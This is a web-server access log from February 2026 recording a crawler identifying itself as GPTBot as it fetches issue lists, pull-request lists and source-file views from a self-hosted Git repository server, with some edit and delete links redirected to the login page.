200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:19:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:19:38:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:19:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:19:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11005] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11247] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:19:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11368] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt?display=source" [Client 74.7.227.38] [Length 13808] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:19:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt?display=source" [Client 74.7.227.38] [Length 14095] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:19:38:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt?display=source" [Client 74.7.227.38] [Length 14095] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:19:38:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt?display=source" [Client 74.7.227.38] [Length 14098] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:19:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt?display=source" [Client 74.7.227.38] [Length 13811] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:19:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt?display=source" [Client 74.7.227.38] [Length 14097] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:19:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py?display=source" [Client 74.7.227.38] [Length 20569] [Gzip 6.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:19:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt?display=source" [Client 74.7.227.38] [Length 12523] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" +[17/Feb/2026:19:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt?display=source" [Client 74.7.227.38] [Length 11494] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" +[17/Feb/2026:19:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12023] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20583] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/Project%20Planning-1.md" +[17/Feb/2026:19:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9962] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1%2freply%2fcmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 44210] [Gzip 14.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12022] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:39:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12?display=source" [Client 74.7.227.38] [Length 11799] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:19:39:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:19:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9950] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" +[17/Feb/2026:19:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat?display=source" [Client 74.7.227.38] [Length 13279] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" +[17/Feb/2026:19:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md?display=source" [Client 74.7.227.38] [Length 24029] [Gzip 6.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 